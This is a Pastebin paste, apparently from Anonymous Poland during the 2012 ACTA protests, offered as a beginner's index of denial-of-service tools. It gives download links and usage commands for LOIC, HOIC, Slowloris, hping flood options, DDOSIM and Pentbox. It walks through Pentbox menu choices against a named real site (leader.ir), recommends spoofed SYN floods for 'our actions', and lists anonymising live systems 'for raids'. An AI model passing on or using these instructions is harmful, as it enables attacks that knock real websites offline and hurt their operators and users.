Advertisement
Guest User

Untitled

a guest
Jan 23rd, 2012
2,621
0
Never
Not a member of Pastebin yet? Sign Up, it unlocks many cool features!
text 6.21 KB | None | 0 0
  1. #Anonymous #Poland #ACTA
  2. https://twitter.com/#!/AnonymousPWAR
  3. relacja http://www.komputerswiat.pl/blogi/blog-redakcyjny/2012/01/wszystko-o-acta.aspx
  4. @n00b tutorial & toolz index
  5.  
  6.  
  7.  
  8. windows
  9. ---------------------------------------------------------------------------------------------------------
  10.  
  11. LOIC
  12. Download:
  13. https://github.com/NewEraCracker/LOIC/downloads
  14. Usage:
  15.  
  16. HOIC
  17. Download:
  18. http://hoic.99k.org
  19.  
  20. Pentbox
  21. http://www.pentbox.net/download-pentbox/
  22.  
  23.  
  24. Slowloris
  25. http://www.multiupload.nl/8KT494DULW
  26.  
  27. Usage:
  28. http://pastebin.com/5deha9Ug
  29.  
  30.  
  31. r-u-dead-yet?
  32. http://www.hybridsec.com/tools/rudy/
  33.  
  34.  
  35. hping2
  36. Download:
  37. http://www.hping.org/
  38. hping[2 or 3] [TARGET] -p [PORT] --flood [PACKET TYPE] [OTHER OPTIONS]
  39. 4 moar options take a look @ http://pastebin.com/uM1MjN4b
  40.  
  41.  
  42.  
  43. for advanced users:
  44. http://www.thc.org/thc-ssl-dos/
  45.  
  46.  
  47.  
  48. linux
  49. ---------------------------------------------------------------------------------------------------------
  50.  
  51. Pentbox includes :
  52. TCP Flood DoSer
  53. TCP Flood AutoDoSer
  54. Spoofed SYN Flood DoSer [nmap - hping3] <-- best 4 our actions!
  55. Port scanner
  56. Honeypot
  57. PenTBox Secure Instant Messaging
  58. No Hivemode mode included, must fire manually.
  59.  
  60. Download:
  61. http://www.pentbox.net/download-pentbox/ <---
  62. use it as standalone or better with hping3 (see above)
  63.  
  64. startin terminal:
  65. sudo su
  66. cd pentbox
  67. ruby pentbox.rb
  68.  
  69. then type:
  70. 2
  71. 1
  72. 2
  73. input target example: leader.ir
  74. input target port : 80
  75. as default u use random sources but for beeing more effective use it with ur own packages.
  76.  
  77.  
  78. hping3
  79. Download:
  80. http://www.hping.org/hping3-20051105.tar.gz
  81.  
  82. Usage:
  83. hping[2 or 3] [TARGET] -p [PORT] --flood [PACKET TYPE] [OTHER OPTIONS]
  84. 4 moar options take a look @ http://pastebin.com/uM1MjN4b
  85.  
  86.  
  87. slowloris
  88. http://ha.ckers.org/slowloris/
  89.  
  90. Download & Install:
  91. http://ha.ckers.org/slowloris/slowloris.pl
  92.  
  93. perl -MCPAN -e 'install IO::Socket::INET'
  94. perl -MCPAN -e 'install IO::Socket::SSL' | http://search.cpan.org/CPAN/authors/id/B/BE/BEHROOZI/IO-Socket-SSL-0.97.tar.gz
  95. perl -MCPAN -e ’install GetOpt::Long' | http://search.cpan.org/CPAN/authors/id/J/JV/JV/Getopt-Long-2.38.tar.gz
  96.  
  97. Usage:
  98. sudo su
  99. perl slowloris.pl
  100.  
  101. examples:
  102. http ddos ./slowloris.pl -dns www.example.com -port 80 -timeout 2000 -num 500 -tcpto 5
  103. https ddos ./slowloris.pl -dns www.example.com -port 443 -timeout 30 -num 500 -https
  104. 4 moar options take a look @ http://pastebin.com/uM1MjN4b
  105.  
  106.  
  107. loiq
  108. http://sourceforge.net/projects/loiq/files/
  109.  
  110.  
  111. pyloris
  112. ...can utilize SOCKS proxies and SSL connections, and can target protocols such as HTTP, FTP, SMTP, IMAP, and Telnet.
  113.  
  114. Download:
  115. http://sourceforge.net/projects/pyloris/files/pyloris/3.2/pyloris-3.2.tgz/download
  116.  
  117.  
  118. pyloic (python loic)
  119.  
  120. Download:
  121. https://github.com/kenkeiras/pyLOIC/downloads
  122.  
  123. Usage:
  124.  
  125.  
  126. r-u-dead-yet?
  127. Download:
  128. http://www.hybridsec.com/tools/rudy/
  129.  
  130.  
  131. DDOSIM
  132. Info:
  133. http://stormsecurity.wordpress.com/2009/03/03/application-layer-ddos-simulator/
  134. Download:
  135. http://sourceforge.net/projects/ddosim/files/ddosim-0.2.tar.gz/download
  136.  
  137. Usage:
  138. ./ddosim
  139. -d IP Target IP address
  140. -p PORT Target port
  141. [-k NET] Source IP from class C network (ex. 10.4.4.0)
  142. [-i IFNAME] Output interface name
  143. [-c COUNT] Number of connections to establish
  144. [-w DELAY] Delay (in milliseconds) between SYN packets
  145. [-r TYPE] Request to send after TCP 3-way handshake. TYPE can be HTTP_VALID or HTTP_INVALID or SMTP_EHLO
  146. [-t NRTHREADS] Number of threads to use when sending packets (default 1)
  147. [-n] Do not spoof source address (use local address)
  148. [-v] Verbose mode (slower)
  149. [-h] Print this help message
  150. Examples:
  151. 1. Establish 10 TCP connections from random IP addresses to www server and send invalid HTTP requests (similar to a DC++ based attack):
  152. ./ddosim -d 192.168.1.2 -p 80 -c 10 -r HTTP_INVALID -i eth0
  153. 2. Establish infinite connections from source network 10.4.4.0 to SMTP server and send EHLO requests:
  154. ./ddosim -d 192.168.1.2 -p 25 -k 10.4.4.0 -c 0 -r SMTP_EHLO -i eth0
  155. 3. Establish infinite connections at higher speed to www server and make HTTP valid requests:
  156. ./ddosim -d 192.168.1.2 -p 80 -c 0 -w 0 -t 10 -r HTTP_VALID -i eth0
  157. 4. Establish infinite TCP connections (without sending a Layer 7 request) from local address to a POP3 server:
  158. ./ddosim -d 192.168.1.2 -p 110 -c 0 -i eth0
  159.  
  160.  
  161.  
  162. for advanced users:
  163. http://www.thc.org/thc-ssl-dos/
  164.  
  165.  
  166.  
  167. MAC
  168. ---------------------------------------------------------------------------------------------------------
  169. ZAP
  170. http://www.cowfight.com/cf4/zapattack/
  171. http://www.cowfight.com/cf4/zapattack/
  172.  
  173.  
  174. Pentbox
  175. http://www.pentbox.net/download-pentbox/
  176.  
  177.  
  178. HowTo use LOIC (or others) on a MAC using MONO:
  179. https://github.com/NewEraCracker/LOIC/wiki/How-to-run-LOIC-using-Mono
  180.  
  181.  
  182.  
  183.  
  184. Operation Systems
  185. ---------------------------------------------------------------------------------------------------------
  186. http://insurgen.cc/index.php?title=L/i/nux
  187. http://insurgen.cc/index.php?title=W/i/ndows
  188.  
  189.  
  190. AnonOS
  191. http://operationcelebration.net/wiki/AnonOS
  192.  
  193.  
  194. Annonaceae v.0.0.3 MELCHISEDEK (PROJECT BASIS.) http://www.filefactory.com/file/b513ah8/n/annonaceae.iso
  195.  
  196.  
  197. AnonOS (Strictly Defensive)
  198. Rebulding is planned! v0.1 (initial!) http://piratenpad.de/AnonOS-v0-1 Documentation: http://piratepad.net/3540VLXFg7
  199.  
  200.  
  201. Cherimoya Internet Security LiveCD (for raids)
  202. v.0.0.1 MELCHISEDEK (Merged from another project) http://ge.tt/3nrRkBf Documentation: http://piratepad.net/3540VLXFg7
  203.  
  204.  
  205. TAILS
  206. https://amnesia.boum.org/
  207. Download:
  208. http://dl.amnesia.boum.org/tails/stable/
  209.  
  210.  
  211. AnonymOS
  212. http://sourceforge.net/projects/anonym-os/files/Anonym.OS%20Live%20CD/ShmooCon%202006/anonymos-shmoo.iso/download
  213.  
  214.  
  215. Liberte Linux - persistent,portable USB OS 4 anon communikation
  216. http://dee.su/liberte
  217.  
  218. Download:
  219. http://sourceforge.net/projects/liberte/files/2010.1/liberte-2010.1.zip/download
  220.  
  221.  
  222. Privatix - persistent,portable USB OS 4 privacy & encryption
  223. http://download.kommunikationssystem.de/privatix_10.02.07_de.iso
  224.  
  225.  
  226. to make linux distros portable use http://unetbootin.sourceforge.net/
Advertisement
Add Comment
Please, Sign In to add comment
Advertisement